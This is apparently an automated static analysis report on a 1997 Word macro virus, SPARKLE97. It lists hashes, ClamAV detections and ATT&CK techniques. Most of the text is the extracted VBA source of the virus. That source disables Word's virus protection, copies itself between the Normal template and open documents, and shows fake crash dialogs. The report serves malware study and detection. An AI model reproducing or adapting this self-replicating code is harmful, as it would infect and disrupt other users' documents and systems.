Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b64c9aa93d6e5d3a…

MALICIOUS

Office (OLE)

63.5 KB Created: 1997-05-02 17:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6f495226da1b7b76458261ade4f362dc SHA-1: b265920d8ba5f1b9e237212d6ab6e9413d4d80ab SHA-256: b64c9aa93d6e5d3a3db5a7e065e0553e8caf4af5918eead392d75535f34f5070
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The macro code, specifically the 'Sparkle' subroutine, attempts to copy itself and associated user forms ('userform999', 'userform900') from the Normal template to the active document. This action is indicative of a macro-based malware designed for persistence or propagation. The ClamAV detections 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Sparkle-2' further support the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16108 bytes
SHA-256: 0ff9aac1a69629dda42ecd5605df0cb5e276c0e4c96aef6c9dd9b5b258d6dc85
Detection
ClamAV: Doc.Trojan.Sparkle-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Sparkle"
Sub FileSave()
    On Error GoTo Error
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Sparkle" Then
            DocumentInstalled = True
        End If
        Next
    For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Sparkle" Then
            GlobalInstalled = True
        End If
        Next
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
    With ActiveDocument
        .BuiltInDocumentProperties(wdPropertyTitle) = "SPARKLE97"
        .BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
        .BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
        .BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
        .BuiltInDocumentProperties(wdPropertyCompany) = "Eifel Epidemic"
        .BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus Was Made By Talon"
         End With
        End If
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
        End If

Sparkle
Error:
End Sub
Sub Toolsmacro()
On Error GoTo Error
userform999.Show
Error:
End Sub
Sub Filetemplates()
On Error GoTo Error
userform900.Show
Error:
End Sub
Sub Sparkle()
On Error GoTo Error
If WeekDay(Now()) = 2 And Hour(Now()) = 9 Then
With ActiveDocument.Content
    .Font.Animation = wdAnimationSparkleText
Application.StatusBar = True
StatusBar = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
Application.Caption = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
Error:
End Sub
Sub ViewVbCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Tasks.ExitWindows
End Sub

Attribute VB_Name = "userform999"
Attribute VB_Base = "0{77DA0ACF-C32C-11D0-B4FA-444553540000}{77DA0AC9-C32C-11D0-B4FA-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ListBox2_Click()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Unload userform999
End Sub
Private Sub UserForm_Initialize()
    ComboBox1.AddItem "Normal.dot(global template)"
End Sub
Private Sub CommandButton2_Click()
Unload userform999
End Sub
Private Sub CommandButton5_Click()
MsgBox "This program has performed an illegal operation and will shut down.
... (truncated)